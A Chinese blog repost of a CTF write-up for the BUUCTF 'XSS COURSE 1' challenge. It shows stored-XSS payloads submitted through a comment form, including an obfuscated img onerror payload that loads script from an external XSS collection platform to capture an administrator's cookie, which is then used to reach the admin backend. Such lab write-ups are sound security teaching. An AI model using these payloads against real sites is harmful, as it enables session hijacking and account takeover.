首页 > 其他 > 详细

BUU XSS COURSE 1

时间:2021-08-19 08:28:17      阅读:148      评论:0      收藏:0      [点我收藏+]

打开网页,发现有吐槽和登录两个窗口

技术分享图片

尝试登录发现不行,也没有注册窗口,来到吐槽

技术分享图片

技术分享图片

 

输入的内容会在给的地址中显示出来

构造

<script>alert(1)</script>

技术分享图片

 

 

访问给的地址/#/view/afb178d8-47ea-4a7a-f9e1-c34d5ac3eef7,没有发现内容

重新构造

<IMG SRC="javascript.:alert(‘XSS‘);">

 

 

 

 发现一个打不开的图片,存在xss漏洞

技术分享图片

 

靶机无法访问外网,用内网xss平台,注册一个账号,创建“我的项目”

</textarea>‘"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fxss.buuoj.cn%2F8sVXk7%22%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>

把xss代码在“吐槽”提交以后,访问一下给的地址,回到XSS平台的项目内容就可以看到两个刚接收到的内容,其中有一个是管理员访问。

技术分享图片

利用管理员的cookie,以及来访地址http://XXXXXXXXXXXXXXXXX.node3.buuoj.cn/backend/admin.php登录即可得到flag

技术分享图片

 

 

 

BUU XSS COURSE 1

原文:https://www.cnblogs.com/SONGYUELV/p/15159322.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!